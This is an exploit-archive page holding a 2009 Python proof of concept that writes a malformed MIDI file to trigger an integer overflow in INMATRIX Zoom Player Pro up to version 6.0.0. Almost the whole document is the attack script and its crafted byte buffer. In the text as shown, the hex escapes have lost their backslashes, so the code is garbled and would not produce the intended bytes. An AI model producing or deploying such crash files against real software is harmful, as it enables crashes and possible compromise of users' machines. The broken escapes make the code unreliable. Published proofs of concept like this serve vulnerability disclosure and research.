INMATRIX Zoom Player Pro <= 6.0.0 (.MID) Integer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : INMATRIX Zoom Player Pro <= 6.0.0 (.MID) Integer Overflow PoC
# Published : 2009-09-10
# Author : Dr_IDE
# Previous Title : WarFTPd 1.82.00-RC12 (LIST command) Format String DoS Exploit
# Next Title : Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln

#!/usr/bin/env python

##################################################################
#
# INMATRIX Zoom Player Pro <= 6.0.0 (.MID) Integer Overflow PoC 
# Found By:	Dr_IDE
# Credits:	Platen
# Tested:	verified on v 5.0.2 and 6.0.0 on XP SP3
# Download:	http://www.inmatrix.com
#
##################################################################

# MIDI Structure must be accurate
# 
buff = (
"x4dx54x68x64x00x00x00x06x00x01x00x01x00x60x4dx54"
"x72x6bx00x00x00x4ex00xffx03x08x34x31x33x61x34x61"
"x35x30x00x91x41x60x01x3ax60x01x4ax60x01x50x60x7d"
"x81x41x01x01x3ax5fx8dxe4xa0x01x50x01x3dx91x41x60"
"x81x00x81x41x40x00x91x3ax60x81x00x76x6fxccx3dxa6"
"xc2x48xeex8excaxc2x57x00x91x50x60x81x00x81x50x40"
"x00xffx2fx00");                                                    

f1 = open("midi.mid","w");
f1.write(buff);
f1.close();

# www.Syue.com [2009-09-10]